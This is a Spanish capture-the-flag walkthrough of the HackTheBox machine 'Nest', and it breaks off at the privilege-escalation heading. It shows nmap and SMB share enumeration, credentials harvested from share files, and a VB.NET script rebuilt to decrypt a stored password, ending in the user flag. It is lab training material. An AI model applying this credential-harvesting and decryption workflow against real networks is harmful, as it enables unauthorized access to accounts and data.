Nest es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Nest 10.10.10.178 a /etc/hosts como nest.htb y comenzamos con el escaneo de puertos nmap.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 |
# Nmap 7.80 scan initiated Fri May 8 09:33:40 2020 as: nmap -Pn -A -T5 -p1-65535 -oA nest-nmap 10.10.10.178 Nmap scan report for 10.10.10.178 Host is up (0.055s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.80%I=7%D=5/8%Time=5EB50BD7%P=x86_64-pc-linux-gnu%r(NUL SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20 SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\ SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\ SF:r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\n SF:DEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCookie SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionRe SF:q,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21 SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21," SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\n SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A, SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20c SF:ommand\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\ SF:r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2 SF:\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\ SF:r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\ SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Re SF:porting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20 SF:Reporting\x20Service\x20V1\.2\r\n\r\n>"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Host script results: |_clock-skew: 3m31s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-08T07:42:04 |_ start_date: 2020-05-08T04:33:05 TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 53.44 ms 10.10.14.1 2 57.00 ms 10.10.10.178 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri May 8 09:39:09 2020 -- 1 IP address (1 host up) scanned in 329.27 seconds |
Observamos que tiene abierto el puerto 445, así que vamos a ver si por esta parte podemos obtener información relevante de la máquina.
Enumeración de SMB
Observamos que en un primer vistazo tenemos varias carpetas compartidas visibles sin necesidad de contraseña:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
# smbclient -L \\\\10.10.10.178 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available |
Revisamos los directorios y vemos ficheros interesantes en la carpeta Data:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
# smbclient \\\\10.10.10.178\\Data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Thu Aug 8 00:53:46 2019 .. D 0 Thu Aug 8 00:53:46 2019 IT D 0 Thu Aug 8 00:58:07 2019 Production D 0 Mon Aug 5 23:53:38 2019 Reports D 0 Mon Aug 5 23:53:44 2019 Shared D 0 Wed Aug 7 21:07:51 2019 \IT NT_STATUS_ACCESS_DENIED listing \IT\* \Production NT_STATUS_ACCESS_DENIED listing \Production\* \Reports NT_STATUS_ACCESS_DENIED listing \Reports\* \Shared . D 0 Wed Aug 7 21:07:51 2019 .. D 0 Wed Aug 7 21:07:51 2019 Maintenance D 0 Wed Aug 7 21:07:32 2019 Templates D 0 Wed Aug 7 21:08:07 2019 \Shared\Maintenance . D 0 Wed Aug 7 21:07:32 2019 .. D 0 Wed Aug 7 21:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019 \Shared\Templates . D 0 Wed Aug 7 21:08:07 2019 .. D 0 Wed Aug 7 21:08:07 2019 HR D 0 Wed Aug 7 21:08:01 2019 Marketing D 0 Wed Aug 7 21:08:06 2019 \Shared\Templates\HR . D 0 Wed Aug 7 21:08:01 2019 .. D 0 Wed Aug 7 21:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019 \Shared\Templates\Marketing . D 0 Wed Aug 7 21:08:06 2019 .. D 0 Wed Aug 7 21:08:06 2019 smb: \> |
Así que nos descargamos los ficheros “Maintenance Alerts.txt” y “Welcome Email.txt” para su revisión:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
smb: \Shared\> cd Maintenance\ smb: \Shared\Maintenance\> mget Alerts.txt NT_STATUS_NO_SUCH_FILE listing \Shared\Maintenance\Alerts.txt smb: \Shared\Maintenance\> exit root@kali:/data/ctf/htb/machines/todo/nest.htb# smbclient \\\\10.10.10.178\\Data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> cd Shared\Maintenance\ smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt" Get file Maintenance Alerts.txt? y getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec) smb: \Shared\Maintenance\> cd ../Templates/HR smb: \Shared\Templates\HR\> mget "Welcome Email.txt" Get file Welcome Email.txt? y getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (1,9 KiloBytes/sec) (average 1,0 KiloBytes/sec) smb: \Shared\Templates\HR\> |
Y comprobamos su contenido:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
# cat Maintenance\ Alerts.txt There is currently no scheduled maintenance workroot # cat Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HRroot |
Encontramos un usuario y una contraseña de acceso en el fichero “Welcome Email.txt” que comprobaremos a continuación para acceder por SMB e intentar llegar a otras carpetas compartidas.
Accedemos con el usuario a la misma carpeta Data y observamos que ahora vemos más ficheros y directorio que antes:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 |
# smbclient \\\\10.10.10.178\\Data -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Thu Aug 8 00:53:46 2019 .. D 0 Thu Aug 8 00:53:46 2019 IT D 0 Thu Aug 8 00:58:07 2019 Production D 0 Mon Aug 5 23:53:38 2019 Reports D 0 Mon Aug 5 23:53:44 2019 Shared D 0 Wed Aug 7 21:07:51 2019 \IT . D 0 Thu Aug 8 00:58:07 2019 .. D 0 Thu Aug 8 00:58:07 2019 Archive D 0 Tue Aug 6 00:33:58 2019 Configs D 0 Thu Aug 8 00:59:34 2019 Installs D 0 Thu Aug 8 00:08:30 2019 Reports D 0 Sun Jan 26 01:09:13 2020 Tools D 0 Tue Aug 6 00:33:43 2019 \Production . D 0 Mon Aug 5 23:53:38 2019 .. D 0 Mon Aug 5 23:53:38 2019 \Reports . D 0 Mon Aug 5 23:53:44 2019 .. D 0 Mon Aug 5 23:53:44 2019 \Shared . D 0 Wed Aug 7 21:07:51 2019 .. D 0 Wed Aug 7 21:07:51 2019 Maintenance D 0 Wed Aug 7 21:07:32 2019 Templates D 0 Wed Aug 7 21:08:07 2019 \IT\Archive . D 0 Tue Aug 6 00:33:58 2019 .. D 0 Tue Aug 6 00:33:58 2019 \IT\Configs . D 0 Thu Aug 8 00:59:34 2019 .. D 0 Thu Aug 8 00:59:34 2019 Adobe D 0 Wed Aug 7 21:20:09 2019 Atlas D 0 Tue Aug 6 13:16:18 2019 DLink D 0 Tue Aug 6 15:25:27 2019 Microsoft D 0 Wed Aug 7 21:23:26 2019 NotepadPlusPlus D 0 Wed Aug 7 21:31:37 2019 RU Scanner D 0 Wed Aug 7 22:01:13 2019 Server Manager D 0 Tue Aug 6 15:25:19 2019 \IT\Installs . D 0 Thu Aug 8 00:08:30 2019 .. D 0 Thu Aug 8 00:08:30 2019 \IT\Reports . D 0 Sun Jan 26 01:09:13 2020 .. D 0 Sun Jan 26 01:09:13 2020 \IT\Tools . D 0 Tue Aug 6 00:33:43 2019 .. D 0 Tue Aug 6 00:33:43 2019 \Shared\Maintenance . D 0 Wed Aug 7 21:07:32 2019 .. D 0 Wed Aug 7 21:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019 \Shared\Templates . D 0 Wed Aug 7 21:08:07 2019 .. D 0 Wed Aug 7 21:08:07 2019 HR D 0 Wed Aug 7 21:08:01 2019 Marketing D 0 Wed Aug 7 21:08:06 2019 \IT\Configs\Adobe . D 0 Wed Aug 7 21:20:09 2019 .. D 0 Wed Aug 7 21:20:09 2019 editing.xml AH 246 Sat Aug 3 14:58:42 2019 Options.txt A 0 Mon Oct 10 23:11:14 2011 projects.xml A 258 Tue Jan 8 17:30:52 2013 settings.xml A 1274 Wed Aug 7 21:19:12 2019 \IT\Configs\Atlas . D 0 Tue Aug 6 13:16:18 2019 .. D 0 Tue Aug 6 13:16:18 2019 Temp.XML A 1369 Wed Jun 11 09:38:22 2003 \IT\Configs\DLink . D 0 Tue Aug 6 15:25:27 2019 .. D 0 Tue Aug 6 15:25:27 2019 \IT\Configs\Microsoft . D 0 Wed Aug 7 21:23:26 2019 .. D 0 Wed Aug 7 21:23:26 2019 Options.xml A 4598 Sat Mar 3 20:24:24 2012 \IT\Configs\NotepadPlusPlus . D 0 Wed Aug 7 21:31:37 2019 .. D 0 Wed Aug 7 21:31:37 2019 config.xml A 6451 Thu Aug 8 01:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 21:30:27 2019 \IT\Configs\RU Scanner . D 0 Wed Aug 7 22:01:13 2019 .. D 0 Wed Aug 7 22:01:13 2019 RU_config.xml A 270 Thu Aug 8 21:49:37 2019 \IT\Configs\Server Manager . D 0 Tue Aug 6 15:25:19 2019 .. D 0 Tue Aug 6 15:25:19 2019 \Shared\Templates\HR . D 0 Wed Aug 7 21:08:01 2019 .. D 0 Wed Aug 7 21:08:01 2019 Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019 \Shared\Templates\Marketing . D 0 Wed Aug 7 21:08:06 2019 .. D 0 Wed Aug 7 21:08:06 2019 10485247 blocks of size 4096. 6543359 blocks available smb: \> |
Ahora para poder revisar en su totalidad vamos a descargarnos todo el contenido del directorio Data para analizarlo en profundidad:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
# smbget -R smb://10.10.10.178/Data/ -U TempUser Password for [TempUser] connecting to //Data/10.10.10.178: Using workgroup WORKGROUP, user TempUser smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt Downloaded 16,65kB in 10 seconds |
Revisando los ficheros, observamos dos que tienen contenido interesante RU_config.xml y config.xml
|
1 2 3 4 5 6 |
# cat IT/Configs/RU\ Scanner/RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> |
|
1 2 3 4 5 6 7 8 9 |
# cat IT/Configs/NotepadPlusPlus/config.xml <?xml version="1.0" encoding="Windows-1252" ?> ... <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> ... |
Probamos a descifrar el password del usuario c.smith, que de primera vista parece un base64, pero no conseguimos obtener caracteres legibles.
Seguimos con nuestra búsqueda y observamos que podemos listar el contenido del directorio Secure$ pero no podemos ir más alla de este:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Thu Aug 8 01:08:12 2019 .. D 0 Thu Aug 8 01:08:12 2019 Finance D 0 Wed Aug 7 21:40:13 2019 HR D 0 Thu Aug 8 01:08:11 2019 IT D 0 Thu Aug 8 12:59:25 2019 \Finance NT_STATUS_ACCESS_DENIED listing \Finance\* \HR NT_STATUS_ACCESS_DENIED listing \HR\* \IT NT_STATUS_ACCESS_DENIED listing \IT\* |
Así que con la ruta vista anteriormente probamos a acceder a IT\Carl\ y aqui si podemos, así que listamos
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 |
smb: \> ls IT\Carl\ . D 0 Wed Aug 7 21:42:14 2019 .. D 0 Wed Aug 7 21:42:14 2019 Docs D 0 Wed Aug 7 21:44:00 2019 Reports D 0 Tue Aug 6 15:45:40 2019 VB Projects D 0 Tue Aug 6 16:41:55 2019 \IT\Carl\Docs . D 0 Wed Aug 7 21:44:00 2019 .. D 0 Wed Aug 7 21:44:00 2019 ip.txt A 56 Wed Aug 7 21:44:16 2019 mmc.txt A 73 Wed Aug 7 21:43:42 2019 \IT\Carl\Reports . D 0 Tue Aug 6 15:45:40 2019 .. D 0 Tue Aug 6 15:45:40 2019 \IT\Carl\VB Projects . D 0 Tue Aug 6 16:41:55 2019 .. D 0 Tue Aug 6 16:41:55 2019 Production D 0 Tue Aug 6 16:07:13 2019 WIP D 0 Tue Aug 6 16:47:41 2019 \IT\Carl\VB Projects\Production . D 0 Tue Aug 6 16:07:13 2019 .. D 0 Tue Aug 6 16:07:13 2019 \IT\Carl\VB Projects\WIP . D 0 Tue Aug 6 16:47:41 2019 .. D 0 Tue Aug 6 16:47:41 2019 RU D 0 Fri Aug 9 17:36:45 2019 \IT\Carl\VB Projects\WIP\RU . D 0 Fri Aug 9 17:36:45 2019 .. D 0 Fri Aug 9 17:36:45 2019 RUScanner D 0 Thu Aug 8 00:05:54 2019 RUScanner.sln A 871 Tue Aug 6 16:45:36 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner . D 0 Thu Aug 8 00:05:54 2019 .. D 0 Thu Aug 8 00:05:54 2019 bin D 0 Wed Aug 7 22:00:11 2019 ConfigFile.vb A 772 Thu Aug 8 00:05:09 2019 Module1.vb A 279 Thu Aug 8 00:05:44 2019 My Project D 0 Wed Aug 7 22:00:11 2019 obj D 0 Wed Aug 7 22:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 17:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 14:55:27 2019 SsoIntegration.vb A 133 Thu Aug 8 00:05:58 2019 Utils.vb A 4888 Wed Aug 7 21:49:35 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin . D 0 Wed Aug 7 22:00:11 2019 .. D 0 Wed Aug 7 22:00:11 2019 Debug D 0 Wed Aug 7 21:59:13 2019 Release D 0 Tue Aug 6 14:55:26 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project . D 0 Wed Aug 7 22:00:11 2019 .. D 0 Wed Aug 7 22:00:11 2019 Application.Designer.vb A 441 Tue Aug 6 14:55:13 2019 Application.myapp A 481 Tue Aug 6 14:55:13 2019 AssemblyInfo.vb A 1163 Tue Aug 6 14:55:13 2019 Resources.Designer.vb A 2776 Tue Aug 6 14:55:13 2019 Resources.resx A 5612 Tue Aug 6 14:55:13 2019 Settings.Designer.vb A 2989 Tue Aug 6 14:55:13 2019 Settings.settings A 279 Tue Aug 6 14:55:13 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\obj . D 0 Wed Aug 7 22:00:11 2019 .. D 0 Wed Aug 7 22:00:11 2019 x86 D 0 Wed Aug 7 21:59:18 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug . D 0 Wed Aug 7 21:59:13 2019 .. D 0 Wed Aug 7 21:59:13 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release . D 0 Tue Aug 6 14:55:26 2019 .. D 0 Tue Aug 6 14:55:26 2019 \IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86 . D 0 Wed Aug 7 21:59:18 2019 .. D 0 Wed Aug 7 21:59:18 2019 10485247 blocks of size 4096. 6543359 blocks available smb: \> |
Y posteriormente nos descargamos su contenido:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
# smbget -R smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser Password for [TempUser] connecting to //Secure$/10.10.10.178: Using workgroup WORKGROUP, user TempUser smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln Downloaded 25,18kB in 14 seconds |
Revisando los scripts existentes, y utilizando el portal dotnetfiddle construimos un script con parte de el código de los ficheros Module1.vb, SsoIntegration.vb y Utils.vb y alguna modificación extra que le hacemos obteniendo el siguiente script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
Imports System.Text Imports System.Security.Cryptography Public Class Utils Public Class ConfigFile Public Property Port As Integer Public Property Username As String Public Property Password As String Public Sub SaveToFile(Path As String) Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create) Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile)) Writer.Serialize(File, Me) End Using End Sub Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open) Dim Reader As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile)) Return DirectCast(Reader.Deserialize(File), ConfigFile) End Using End Function End Class Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = System.Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As System.IO.MemoryStream memoryStream = New System.IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount) System.Console.WriteLine(plainText) Return plainText End Function Public Class SsoIntegration Public Property Username As String Public Property Password As String End Class Sub Main() Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")} End Sub End Class |
Y al ejecutar el mismo, obtenemos la clave del usuario c.smith en texto plano xRxRxPANCAK3SxRxRx.
Obteniendo la flag de user
Con la contraseña en claro del usuario c.smith vamos a comprobar el contenido de la carpeta Users
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
# smbclient \\\\10.10.10.178\\Users -U "c.smith" Enter WORKGROUP\c.smith's password: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> ls . D 0 Sun Jan 26 00:04:21 2020 .. D 0 Sun Jan 26 00:04:21 2020 Administrator D 0 Fri Aug 9 17:08:23 2019 C.Smith D 0 Sun Jan 26 08:21:44 2020 L.Frost D 0 Thu Aug 8 19:03:01 2019 R.Thompson D 0 Thu Aug 8 19:02:50 2019 TempUser D 0 Thu Aug 8 00:55:56 2019 \Administrator NT_STATUS_ACCESS_DENIED listing \Administrator\* \C.Smith . D 0 Sun Jan 26 08:21:44 2020 .. D 0 Sun Jan 26 08:21:44 2020 HQK Reporting D 0 Fri Aug 9 01:06:17 2019 user.txt A 32 Fri Aug 9 01:05:24 2019 \L.Frost NT_STATUS_ACCESS_DENIED listing \L.Frost\* \R.Thompson NT_STATUS_ACCESS_DENIED listing \R.Thompson\* \TempUser NT_STATUS_ACCESS_DENIED listing \TempUser\* \C.Smith\HQK Reporting . D 0 Fri Aug 9 01:06:17 2019 .. D 0 Fri Aug 9 01:06:17 2019 AD Integration Module D 0 Fri Aug 9 14:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019 \C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 14:18:42 2019 .. D 0 Fri Aug 9 14:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019 smb: \> |
Observamos que en la home del usuario c.smith existe el fichero user.txt, así que lo descargamos y ya tenemos la flag de user.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
# smbclient \\\\10.10.10.178\\Users -U "c.smith" Enter WORKGROUP\c.smith's password: Try "help" to get a list of possible commands. smb: \> cd C.Smith smb: \C.Smith\> ls . D 0 Sun Jan 26 08:21:44 2020 .. D 0 Sun Jan 26 08:21:44 2020 HQK Reporting D 0 Fri Aug 9 01:06:17 2019 user.txt A 32 Fri Aug 9 01:05:24 2019 10485247 blocks of size 4096. 6543238 blocks available smb: \C.Smith\> get user.txt getting file \C.Smith\user.txt of size 32 as user.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec) smb: \C.Smith\> |
Escalando privilegios
